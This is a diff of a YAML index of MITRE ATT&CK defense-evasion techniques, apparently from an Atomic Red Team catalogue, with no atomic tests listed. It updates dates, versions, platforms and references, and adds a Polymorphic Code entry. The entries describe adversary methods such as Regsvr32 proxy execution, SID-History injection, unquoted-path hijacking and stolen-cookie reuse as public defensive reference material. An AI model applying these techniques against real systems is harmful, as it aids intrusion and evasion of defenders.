       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -10050,24 +10134,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -10102,9 +10188,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -10127,7 +10210,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10145,8 +10228,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10185,7 +10266,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10228,10 +10309,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10275,7 +10424,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10300,8 +10449,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10332,7 +10479,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10351,7 +10498,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10446,11 +10592,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10530,11 +10675,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10599,12 +10743,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10653,8 +10796,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10669,14 +10812,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10688,7 +10830,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10718,13 +10860,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10785,7 +10926,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10841,11 +10981,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10869,11 +11008,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10898,9 +11036,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10980,7 +11117,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -11014,7 +11150,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -11041,8 +11177,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -11137,48 +11271,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11187,9 +11297,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11201,12 +11316,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11254,7 +11392,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11280,12 +11418,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11375,7 +11511,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11433,12 +11568,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11480,10 +11614,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11507,18 +11640,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11532,7 +11677,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11544,20 +11689,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11566,11 +11702,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11579,6 +11714,7 @@ defense-evasion:
       kill_chain_phases:
